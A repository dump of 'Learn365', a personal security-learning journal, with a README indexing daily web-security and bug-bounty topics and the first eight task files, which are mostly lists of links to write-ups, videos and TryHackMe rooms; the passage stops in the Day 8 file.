Repository: Imran407704/Learn365
Branch: main
Commit: 25a810c05267
Files: 146
Total size: 132.1 KB
Directory structure:
gitextract_nhcxwvz6/
├── README.md
└── Resources/
├── Day 01 Task.md
├── Day 02 Task.md
├── Day 03 Task.md
├── Day 04 Task.md
├── Day 05 Task.md
├── Day 06 Task.md
├── Day 07 Task.md
├── Day 08 Task.md
├── Day 09 Task.md
├── Day 10 Task.md
├── Day 100 Task.md
├── Day 101 Task.md
├── Day 102 Task.md
├── Day 103 Task.md
├── Day 104 Task.md
├── Day 105 Task.md
├── Day 106 Task.md
├── Day 107 Task.md
├── Day 108 Task.md
├── Day 109 Task.md
├── Day 11 Task.md
├── Day 110 Task.md
├── Day 111 Task.md
├── Day 112 Task.md
├── Day 113 Task.md
├── Day 114 Task.md
├── Day 115 Task.md
├── Day 116 Task.md
├── Day 117 Task.md
├── Day 118 Task.md
├── Day 119 Task.md
├── Day 12 Task.md
├── Day 120 Task.md
├── Day 121 Task.md
├── Day 122 Task.md
├── Day 123 Task.md
├── Day 124 Task.md
├── Day 125 Task.md
├── Day 126 Task.md
├── Day 127 Task.md
├── Day 128 Task.md
├── Day 129 Task.md
├── Day 13 Task.md
├── Day 130 Task.md
├── Day 131 Task.md
├── Day 132 Task.md
├── Day 133 Task.md
├── Day 134 Task.md
├── Day 135 Task.md
├── Day 136 Task.md
├── Day 137 Task.md
├── Day 138 Task.md
├── Day 139 Task.md
├── Day 14 Task.md
├── Day 140 Task.md
├── Day 141 Task.md
├── Day 142 Task.md
├── Day 143 Task.md
├── Day 144 Task.md
├── Day 145 Task.md
├── Day 15 Task.md
├── Day 16 Task.md
├── Day 17 Task.md
├── Day 18 Task.md
├── Day 19 Task.md
├── Day 20 Task.md
├── Day 21 Task.md
├── Day 22 Task.md
├── Day 23 Task.md
├── Day 24 Task.md
├── Day 25 Task.md
├── Day 26 Task.md
├── Day 27 Task.md
├── Day 28 Task.md
├── Day 29 Task.md
├── Day 30 Task.md
├── Day 31 Task.md
├── Day 32 Task.md
├── Day 33 Task.md
├── Day 34 Task.md
├── Day 35 Task.md
├── Day 36 Task.md
├── Day 37 Task.md
├── Day 38 Task.md
├── Day 39 Task.md
├── Day 40 Task.md
├── Day 41 Task.md
├── Day 42 Task.md
├── Day 43 Task.md
├── Day 44 Task.md
├── Day 45 Task.md
├── Day 46 Task.md
├── Day 47 Task.md
├── Day 48 Task.md
├── Day 49 Task.md
├── Day 50 Task.md
├── Day 51 Task.md
├── Day 52 Task.md
├── Day 53 Task.md
├── Day 54 Task.md
├── Day 55 Task.md
├── Day 56 Task.md
├── Day 57 Task.md
├── Day 58 Task.md
├── Day 59 Task.md
├── Day 60 Task.md
├── Day 61 Task.md
├── Day 62 Task.md
├── Day 63 Task.md
├── Day 64 Task.md
├── Day 65 Task.md
├── Day 66 Task.md
├── Day 67 Task.md
├── Day 68 Task.md
├── Day 69 Task.md
├── Day 70 Task.md
├── Day 71 Task.md
├── Day 72 Task.md
├── Day 73 Task.md
├── Day 74 Task.md
├── Day 75 Task.md
├── Day 76 Task.md
├── Day 77 Task.md
├── Day 78 Task.md
├── Day 79 Task.md
├── Day 80 Task.md
├── Day 81 Task.md
├── Day 82 Task.md
├── Day 83 Task.md
├── Day 84 Task.md
├── Day 85 Task.md
├── Day 86 Task.md
├── Day 87 Task.md
├── Day 88 Task.md
├── Day 89 Task.md
├── Day 90 Task.md
├── Day 91 Task.md
├── Day 92 Task.md
├── Day 93 Task.md
├── Day 94 Task.md
├── Day 95 Task.md
├── Day 96 Task.md
├── Day 97 Task.md
├── Day 98 Task.md
└── Day 99 Task.md
================================================
FILE CONTENTS
================================================
================================================
FILE: README.md
================================================
[#Learn365](https://twitter.com/search?q=%23learn365&src=typeahead_click)
The purpose of [#Learn365](https://twitter.com/search?q=%23learn365&src=typeahead_click) collection is to create informational content in multiple codecs and share with the community to allow knowledge advent and studying.
Inspired by [@harshbhotra](https://twitter.com/harshbothra_)
## Resources
| Days | Topic |
| ----------------- | ------------------------------------------------------------------ |
| Day 1 | [SSRF,RedTeam](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2001%20Task.md) |
| Day 2 | [SSRF,RedTeam,THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2002%20Task.md) |
| Day 3 | [SSRF,RedTeam,THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2003%20Task.md) |
| Day 4 | [Broken Link Hijacking, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2004%20Task.md) |
| Day 5 | [Blind XSS,THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2005%20Task.md) |
| Day 6 | [log4j, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2006%20Task.md) |
| Day 7 | [Password Reset link not expire, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2007%20Task.md) |
| Day 8 | [DMARC, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2008%20Task.md) |
| Day 9 | [CSRF, Linux PrivEsc](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2009%20Task.md) |
| Day 10 | [Clickjacking, Linux PrivEsc](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2010%20Task.md) |
| Day 11 | [Live Bug Hunting, Linux PrivEsc](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2011%20Task.md) |
| Day 12 | [Bug Bounty Wordlist, Linux PrivEsc](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2012%20Task.md) |
| Day 13 |[OWASP Web Application Security Testing, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2013%20Task.md) |
| Day 14 |[4.1.2 OWASP Fingerprint Web Server, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2014%20Task.md) |
| Day 15 |[4.1.3 OWASP Review Webserver Metafiles for Information Leakage, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2015%20Task.md) |
| Day 16 |[4.1.4 Enumerate Applications on Webserver](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2016%20Task.md) |
| Day 17 |[4.1.5 Review Webpage Content for Information Leakage, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2017%20Task.md) |
| Day 18 |[4.1.6 Identify Application Entry Points](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2018%20Task.md) |
| Day 19 |[4.1.7 Map Execution Paths Through Application, Github Recon](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2019%20Task.md) |
| Day 20 |[4.1.8 Fingerprint Web Application Framework, Recon Techniques](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2020%20Task.md) |
| Day 21 |[4.1.9,10 Map Application Architecture, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2021%20Task.md) |
| Day 22 |[4.2 Configuration and Deployment Management Testing, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2022%20Task.md) |
| Day 23 |[4.2.2 Test Application Platform Configuration, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2023%20Task.md) |
| Day 24 |[4.2.3 Test File Extensions Handling for Sensitive Information, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2024%20Task.md) |
| Day 25 |[4.2.4 Review Old Backup and Unreferenced Files for Sensitive Information, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2025%20Task.md) |
| Day 26 |[4.2.5 Enumerate Infrastructure and Application Admin Interfaces, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2026%20Task.md) |
| Day 27 |[4.2.6 Test HTTP Methods (with Video), THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2027%20Task.md) |
| Day 28 |[4.2.7 Test HTTP Strict Transport Security (HSTS), THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2028%20Task.md) |
| Day 29 |[4.2.8 Test RIA Cross Domain Policy, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2029%20Task.md) |
| Day 30 |[4.2.9 Test File Permission, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2030%20Task.md) |
| Day 31 |[4.2.10 Test for Subdomain Takeover, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2031%20Task.md) |
| Day 32 |[4.2.11 Test Cloud Storage, THM Room, eJPT](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2032%20Task.md) |
| Day 33 |[4.2.12 Test for Content Security Policy, THM Room, eJPT](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2033%20Task.md) |
| Day 34 |[4.3.1 Test Role Definitions, THM Room, eJPT](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2034%20Task.md) |
| Day 35 |[4.3.2 Test User Registration Process](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2035%20Task.md) |
| Day 36 |[4.3.3 Test Account Provisioning Process](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2036%20Task.md) |
| Day 37 |[4.3.4 Testing for Account Enumeration and Guessable User Account](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2037%20Task.md) |
| Day 38 |[4.3.5 Testing for Weak or Unenforced Username Policy, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2038%20Task.md) |
| Day 39 |[4.4.1 Testing for Credentials Transported over an Encrypted Channel](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2039%20Task.md) |
| Day 40 |[4.4.2 Testing for Default Credentials](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2040%20Task.md) |
| Day 41 |[CSRF](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2041%20Task.md) |
| Day 42 |[Open Redirect](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2042%20Task.md) |
| Day 43 |[log4j](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2043%20Task.md) |
| Day 44 |[JWT attacks](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2044%20Task.md) |
| Day 45 |[Content Discovery](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2045%20Task.md) |
| Day 46 |[Idor](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2046%20Task.md) |
| Day 47 |[Account takeover](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2047%20Task.md) |
| Day 48 |[RCE on a Java Web Application](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2048%20Task.md) |
| Day 49 |[Dependency Confusion](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2049%20Task.md) |
| Day 50 |[Automate Blind XSS](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2050%20Task.md) |
| Day 51 |[Finding And Exploiting S3 Amazon Buckets For Bug Bounties](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2051%20Task.md) |
| Day 52 |[Web Cache Poisioning attack](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2052%20Task.md) |
| Day 53 |[Unique Case for Price Manipulation](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2053%20Task.md) |
| Day 54 |[Account takeover via the Password Reset Functionality](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2054%20Task.md) |
| Day 55 |[API Token Hijacking Through Clickjacking, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2055%20Task.md)|
| Day 56 |[API Exploitation --→ Business Logic Bug](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2056%20Task.md) |
| Day 57 |[Attended Infosec Community Conference on : Android Static Analysis](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2057%20Task.md) |
| Day 58 |[Finding bugs on NFT website for fun & Profit by zseano](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2058%20Task.md) |
| Day 59 |[EXIF Geolocation Data Not Stripped From Uploaded Images](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2059%20Task.md) |
| Day 60 |[Thick Client Pentesting](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2060%20Task.md) |
| Day 61 |[Conduct a Penetration Test Like a Pro in 6 Phases](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2061%20Task.md) |
| Day 62 |[Firewall Penetration Testing](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2062%20Task.md) |
| Day 63 |[Host Discovery & Vulnerability Scanning With Nessus](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2063%20Task.md) |
| Day 64 |[AWS Web Application Firewall (WAF), 5 Exercise Pentesterlabs](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2064%20Task.md) |
| Day 65 |[Introduction To Pentesting - Enumeration, 6 Pentesterlab Exercise](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2065%20Task.md) |
| Day 66 |[Bypassing CSRF Protection, 5 Pentesterlab Exercise](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2066%20Task.md) |
| Day 67 |[HTML Injection](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2067%20Task.md) |
| Day 68 |[Exploiting SQL Injection, Completed Pentesterlab Unix Badge](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2068%20Task.md) |
| Day 69 |[A Weird Price Tampering Vulnerability, Security Operations Center (SOC)](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2069%20Task.md) |
| Day 70 |[A Summary of OAuth 2.0 Attack Methods](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2070%20Task.md) |
| Day 71 |[6 Methods to bypass CSRF protection on a web application](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2071%20Task.md) |
| Day 72 |[Two-factor authentication security testing and possible bypasses](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2072%20Task.md) |
| Day 73 |[10 Types of Web Vulnerabilities that are Often Missed, Understanding BOLA](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2073%20Task.md) |
| Day 74 |[My First Bug Bounty: SQL Injection, SQL INJECTION VULNERABILITY](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2074%20Task.md) |
| Day 75 |[Dank Writeup On Broken Access Control, Bug bounty tips for broken access control on BurpSuite Part 1](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2075%20Task.md) |
| Day 76 |[SSRF in PDF Renderer using SVG, Bypassing 2FA using OpenID Misconfiguration](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2076%20Task.md) |
| Day 77 |[Easy IDOR hunting with Autorize?, HOW I hacked thousand of subdomains](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2077%20Task.md) |
| Day 78 |[A business logic error bug worth 600$, 5 Methods to bypass Authentication (OTP)](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2078%20Task.md) |
| Day 79 |[How did I earn €€€€ by breaking the back-end logic of the server, How to find IDOR Privilege escalation](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2078%20Task.md) |
| Day 80 |[Account Takeover via Web Cache Poisoning based Reflected XSS, A Pentester's Guide to Server Side Template Injection](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2080%20Task.md) |
| Day 81 |[Account Takeover: From zero to System Admin using basic skills, Apache Example Servlet leads to $$$$](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2081%20Task.md) |
| Day 82 |[The easiest $2500 I got it from bug bounty program, A Pentester’s Guide to File Inclusion](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2082%20Task.md) |
| Day 83 |[How I bypassed disable_functions in php to get a remote shell, JWTs - Patterns & Anti-patterns](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2083%20Task.md) |
| Day 84 |[Finding Your Next Bug: GraphQL, No Rate Limit - 2K$ Bounty](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2084%20Task.md) |
| Day 85 |[Facebook email disclosure and account takeover, How to learn anything in Computer Science or Cybersecurity](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2085%20Task.md) |
| Day 86 |[Hacking banks with race conditions, Exploiting a Race Condition Vulnerability](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2086%20Task.md) |
| Day 87 |[A Comprehensive Guide to Broken Access Control, Never leave this tip while you hunting Broken Access Control, POC](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2087%20Task.md) |
| Day 88 |[A Journey from IDOR to Account Takeover, Exploiting open redirect - Whitelist bypass using Salesforce environment](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2088%20Task.md) |
| Day 89 |[Union Based SQL Injection — Bug Hunting, Bypass confirmation to add payment method](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2089%20Task.md) |
| Day 90 |[Exploiting cross-site scripting in Referer header, XSS via X-Forwarded-Host header](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2090%20Task.md) |
| Day 91 |[How I bypassed 403 forbidden domain using a simple trick, Deleting account via support ticket](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2091%20Task.md) |
| Day 92 |[Bypassing SSRF Protection to Exfiltrate AWS Metadata from LarkSuite, WordPress < 5.8.3 - Object Injection Vulnerability](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2092%20Task.md) |
| Day 93 |[0-day Cross Origin Request Forgery vulnerability in Grafana 8.x](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2093%20Task.md) |
| Day 94 |[GOT ACCESS TO DOTA 2 ADMIN PANEL BY EXPLOITING IN-GAME FEATURE](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2094%20Task.md) |
| Day 95 |[How I escalated RFI into LFI](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2095%20Task.md) |
| Day 96 |[Stumbling upon a new way to exploit authorization bypass in Jira](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2096%20Task.md) |
| Day 97 |[Clickjacking on Google MyAccount Worth 7,500$](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2097%20Task.md) |
| Day 98 |[Info Disclosure and SQLi Writeup](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2098%20Task.md) |
| Day 99 |[CSRF to HTML INJECTION which results in USER CREDENTIALS Stealing](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2099%20Task.md) |
| Day 100 |[RCE with Flask Jinja Template Injection](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20100%20Task.md) |
| Day 101 |[How I could have hacked your Uber account](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20101%20Task.md) |
| Day 102 |[Bug Bounty Live Recon - Linked / JS Discovery!](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20102%20Task.md) |
| Day 103 |[HTTP Request Smuggling on business.apple.com and Others](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20103%20Task.md) |
| Day 104 |[SVG SSRFs and saga of bypasses, A Detailed Guide on Cewl](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20104%20Task.md) |
| Day 105 |[How a YouTube Video lead to pwning a web application via SQL Injection worth $4324 bounty](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20105%20Task.md) |
| Day 106 |[XSS , HTML Injection and File Upload Bypass in HUAWEI Subdomain](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20106%20Task.md) |
| Day 107 |[How Token Misconfiguration can lead to takeover account](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20107%20Task.md) |
| Day 108 |[How to hack any Payment Gateway?](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20108%20Task.md) |
| Day 109 |[Race Condition bypassing team limit](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20109%20Task.md) |
| Day 110 |[Bypass Apple Corp SSO on Apple Admin Panel](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20110%20Task.md) |
| Day 111 |[The Unusual Case of Status code- 301 Redirection to AWS Security Credentials Compromise](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20111%20Task.md) |
| Day 112 |[Find security bugs while you sleep! Using nuclei templates, and more..](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20112%20Task.md) |
| Day 113 |[Getting access to disabled/hidden features with the help of Burpsuite Match and Replace settings](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20113%20Task.md) |
| Day 114 |[Finding bugs to trigger Unauthenticated Command Injection in a NETGEAR router (PSV-2022–0044)](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20114%20Task.md) |
| Day 115 |[How I chained two vulnerabilities to steal credit card details?](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20115%20Task.md) |
| Day 116 |[How I Made The BBC Hall Of Fame 3 Times](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20116%20Task.md) |
| Day 117 |[Improper cookie not expiring after logged out!](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20117%20Task.md) |
| Day 118 |[Open-Redirects, What you doing wrong when you fail at bug bounties?](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20118%20Task.md) |
| Day 119 |[Bypassing WAF for $2222](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20119%20Task.md) |
| Day 120 |[Subdomain Takeover using Mobile??](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20120%20Task.md) |
| Day 121 |[Fuzzing and credentials leakage..awesome bug hunting writeup](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20121%20Task.md) |
| Day 122 |[OTP bypass with response manipulation.](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20122%20Task.md) |
| Day 123 | There is no task Today Enjoy Eid Festival 🥳😊😃 |
| Day 124 |[An Bug Bounty Hunter’s Guide to IDOR Vulnerabilities](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20124%20Task.md) |
| Day 125 |[How I got a lousyT-Shirt from the Dutch Government.](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20125%20Task.md) |
| Day 126 |[Hack the HAckers](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20126%20Task.md) |
| Day 127 |[The $16,000 Dev Mistake](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20127%20Task.md) |
| Day 128 |[Denial of Service through …](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20128%20Task.md) |
| Day 129 |[How i found a vulnerability that leads to access any users’ sensitive data and got $500](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20129%20Task.md) |
| Day 130 |[ToolTime - Cloud Recon 1](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20130%20Task.md) |
| Day 131 |[A Fun SSRF through a Headless Browser](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20131%20Task.md) |
| Day 132 |[2FA Bypass in PickMyCareer.in](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20132%20Task.md) |
| Day 133 |[Exploiting Google Maps API keys for profit](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20133%20Task.md) |
| Day 134 |[Creator Studio’s api endpoint is vulnerable to IDOR, exposes “p40_earnings_usd”:$$$](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20134%20Task.md) |
| Day 135 |[I have 1% chance to hack this company](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20135%20Task.md) |
| Day 136 |[HTTP Request Smuggling: Part-1 (Concepts)](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20136%20Task.md) |
| Day 137 |[Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 1)](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20137%20Task.md) |
| Day 138 |[Can analyzing javascript files lead to remote code execution?](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20138%20Task.md) |
| Day 139 |[My New Discovery In Oracle E-Business Login Panel That Allowed To Access For All Employees Information's & In Some cases Passwords At More Than 1000 Companies](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20139%20Task.md) |
| Day 140 |[Origin IP found, WAF Cloudflare Bypass](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20140%20Task.md) |
| Day 141 |[MFA (Multi-Factor Authentication)](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20141%20Task.md) |
| Day 142 |[Vulnerability In PayPal worth 200000$ bounty, Attacker can Steal Your Balance by One-Click](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20142%20Task.md) |
| Day 143 |[Does ms15–034 still exist today ?](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20143%20Task.md) |
| Day 144 |[How I managed to take over any account visits my profile with Stored XSS](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20144%20Task.md) |
| Day 145 |[The Bucket’s Got a Hole in it](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20145%20Task.md) |
================================================
FILE: Resources/Day 01 Task.md
================================================
Day 1 Task
Writeup :- SSRF
https://infosecwriteups.com/story-of-a-really-cool-ssrf-bug-cf88a3800efc
https://medium.com/@shahjerry33/blind-ssrf-the-hide-seek-game-da9d0ecef2fb
SSRF Tip by Shah Jerry
When testing for Blind SSRF it is common that you’ll find a DNS lookup for the given Burp Collaborator domain, but no HTTP request. This happens because the application
attempted to make HTTP request to domain, which caused initial DNS lookup but the actual HTTP request was blocked by the network-level filtering.If you find only
the DNS lookup or DNS query then it is not a vulnerability, it is mandatory to have the HTTP response which will make it a valid vulnerability.
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Red Team :- https://youtu.be/EIHLXWnK1Dw by
@HackerSploit
================================================
FILE: Resources/Day 02 Task.md
================================================
Day 2 Task
Red Team :
What is MITRE ATT&CK? MITRE ATT&CK Framework by
https://youtube.com/watch?v=IsPArM8xKAM @Infosec_Train
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
SSRF : https://medium.com/@rafaelrodripaz/ssrf-in-import-file-function-d0f1c6397262
https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978
https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-2-a085ec4332c0
https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-3-b0f5997e3739?source=user_profile---------1-------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
THM room :https://tryhackme.com/room/redteamrecon
================================================
FILE: Resources/Day 03 Task.md
================================================
Day 3 Task
SSRF Poc
https://youtube.com/playlist?list=PL9VLN4DOjAsjjAZiPf_vbGp9eGufX7lKY
eJPT resources by
[@grumpzsux](https://twitter.com/grumpzsux)
https://github.com/grumpzsux/eJPT-Notes/
THM room
https://tryhackme.com/room/phishingemails1tryoe
Red Team by
[@q0phi80](https://twitter.com/q0phi80)
from 00:00:00 to 00:59:59
https://youtube.com/watch?v=OtcP8c4wZys
Red team Passive Recon Resources
https://phonebook.cz
https://zoomeye.org
https://spyse.com
https://shodan.io
https://hunter.io
================================================
FILE: Resources/Day 04 Task.md
================================================
🎯 Day 4 Task
✅ Broken link Hijacking
https://www.youtube.com/watch?v=o1RCqBiyoZ0
https://www.youtube.com/watch?v=eOoW9dQC6ps
https://www.youtube.com/watch?v=dpwoIrO3GFw
Blog
https://edoverflow.com/2017/broken-link-hijacking/
https://medium.com/@iamtess5277/what-is-broken-link-hijacking-o-o-872d821da6fd
Tool
https://www.brokenlinkcheck.com/broken-links.php#
https://github.com/stevenvachon/broken-link-checker
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
✅ THM room by [TryHackMe](https://tryhackme.com/)
https://tryhackme.com/room/phishingemails2rytmuv
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
Github Link
https://github.com/Imran407704/Learn365
#infosec #learn365 #redteam #bugbounty
================================================
FILE: Resources/Day 05 Task.md
================================================
🎯 Day 5 Task
✅ Blind XSS
https://infosecwriteups.com/blind-xss-for-beginners-c88e48083071
https://medium.com/@newp_th/how-i-find-blind-xss-vulnerability-in-redacted-com-33af18b56869
https://ashketchum.medium.com/blind-xss-in-google-analytics-admin-panel-3133-70-2185d1cce82a
https://medium.com/@renwa/new-technique-to-find-blind-xss-c2efcd377cc2
https://medium.com/@jr.mayank1999/exploiting-blind-xss-with-burp-collaborator-client-fec38b5fc5e
https://www.youtube.com/watch?v=GcznQUsNW3s by [@thecyberzeel](https://www.youtube.com/c/SpinTheHack)
https://docs.google.com/presentation/d/1wqx9fnr9v451FHdU33XeXBIg3b_pfhF9X0ttkydrGlk/edit#slide=id.gb07b8690e7_0_156
by [@0xAwali](https://twitter.com/0xAwali)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------
https://tryhackme.com/room/ice -
from Connect to Gain Access
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 06 Task.md
================================================
🎯 Day 6 Task
✅ log4j
https://infosecwriteups.com/facts-to-clear-about-log4j-for-bug-bounty-hunters-f58e04eb025
https://akashpatil.me/log4j-guide-book.html by [@skypatil98](https://twitter.com/skypatil98)
✅ Youtube Video
https://www.youtube.com/watch?v=d9eejFgdXCc
https://www.youtube.com/watch?v=5PhYLpHFgfc
https://www.youtube.com/watch?v=w2F67LbEtnk
---------------------------------------------------------------------------------------------------------------------------------------------------------------------
✅ THM Room
https://tryhackme.com/room/nmap01
#infosec #learn365 #bugbounty
================================================
FILE: Resources/Day 07 Task.md
================================================
🎯 Day 7 Task
✅ Password Reset Link not expiring
https://shahjerry33.medium.com/password-reset-link-doesnt-expires-on-email-change-39aec24fbed4
https://hackerone.com/reports/685007
https://hackerone.com/reports/898841
✅ Youtube Video
https://www.youtube.com/watch?v=7sx-_qwlt6Q
https://www.youtube.com/watch?v=58Cpt1tzm-w
https://www.youtube.com/watch?v=ZPYwWlTBWJ0
✅ THM Room
https://tryhackme.com/room/windowsfundamentals1xbx
#bugbounty #infosec #learn365
================================================
FILE: Resources/Day 08 Task.md
================================================
🎯 Day 8 Task
✅ How to report DMARK ?
